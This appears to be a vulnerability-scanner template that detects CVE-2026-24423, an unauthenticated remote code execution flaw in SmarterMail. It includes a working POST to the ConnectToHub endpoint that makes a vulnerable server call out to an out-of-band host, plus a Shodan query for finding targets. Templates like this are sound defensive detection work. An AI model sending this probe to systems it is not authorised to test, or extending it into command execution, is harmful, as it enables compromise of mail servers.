SmarterMail - Remote Code Execution

id: CVE-2026-24423

info:
  name: SmarterMail - Remote Code Execution
  author: jyoti369
  severity: critical
  description: |
    SmarterTools SmarterMail < build 9511 contains an unauthenticated remote code execution caused by malicious OS command execution via ConnectToHub API method, letting remote attackers execute arbitrary commands, exploit requires no authentication.
  impact: |
    Remote attackers can execute arbitrary OS commands, potentially leading to full system compromise.
  remediation: |
    Update to build 9511 or later.
  reference:
    - https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423
    - https://code-white.com/public-vulnerability-list/
    - https://www.smartertools.com/smartermail/release-notes/current
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24423
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-24423
    epss-score: 0.80272
    epss-percentile: 0.99123
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,smartermail,rce,oast,kev,vkev

http:
  - raw:
      - |
        POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"hubAddress":"http://{{interactsh-url}}","oneTimePassword":"{{randstr}}","nodeName":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "setup-initial-connection"
# digest: 4b0a00483046022100af4d4c5f4937642f95388d2136aa2f43a8335a7455431ffebf1f00b952fbd2bb022100c1c97d64f255d803246eead87b7057d1a0972a5bb69f498d089ac01446b184d2:922c64590222798bb761d5b6d8e72950